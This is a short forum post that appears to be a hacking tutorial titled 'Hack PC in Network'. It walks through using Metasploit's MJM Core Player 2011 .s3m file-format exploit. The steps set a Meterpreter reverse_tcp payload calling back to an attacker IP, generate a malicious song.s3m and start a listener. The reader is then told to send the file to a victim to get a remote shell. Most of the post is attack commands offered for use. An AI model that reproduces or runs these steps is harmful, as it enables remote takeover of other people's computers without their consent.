Hack PC in Network using MJM Core Player 2011 .s3m Stack Buffer Overflow

legeek91 · Friday at 10:11 PM

This module exploits a stack buffer overflow in MJM Core Player 2011 when opening a malicious s3m file in this applications, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7

Exploit Targets

Windows XP SP 3

Windows 7

MJM Core Player 2011

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/mjm_coreplayer2011_s3m

msf exploit (mjm_coreplayer2011_s3m)>set payload windows/meterpreter/reverse_tcp

msf exploit (mjm_coreplayer2011_s3m)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (mjm_coreplayer2011_s3m)>exploit

After we successfully generate the malicious s3m File, it will stored on your local computer

/root/.msf4/local/song.s3m

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

exploit

Now send your song.s3m files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack PC in Network using MJM Core Player 2011 .s3m Stack Buffer Overflow

More options

legeek91

428,313

310,989

310,998